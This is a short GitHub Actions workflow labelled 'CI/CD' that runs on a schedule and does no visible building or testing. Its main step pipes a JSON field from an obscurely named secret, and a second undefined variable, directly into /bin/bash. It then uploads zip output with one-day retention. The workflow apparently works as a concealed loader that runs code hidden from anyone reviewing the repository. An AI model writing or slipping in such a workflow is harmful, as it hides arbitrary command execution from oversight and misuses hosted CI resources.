name: CI/CD
on:
  workflow_dispatch:

  schedule:
    - cron: '26 4,10,16,22 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  trigger:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Start
        env:
          trhvy65: ${{ secrets.trhvy65 }}
        run: |
          printf '%s' "$trhvy65" | jq -r .wydpo4517 | /bin/bash
          echo $xuq300 | jq -r .bjlwl806 | /bin/bash

      - name: Save output
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: ERQxoOm1
          path: "*.zip"
          retention-days: 1
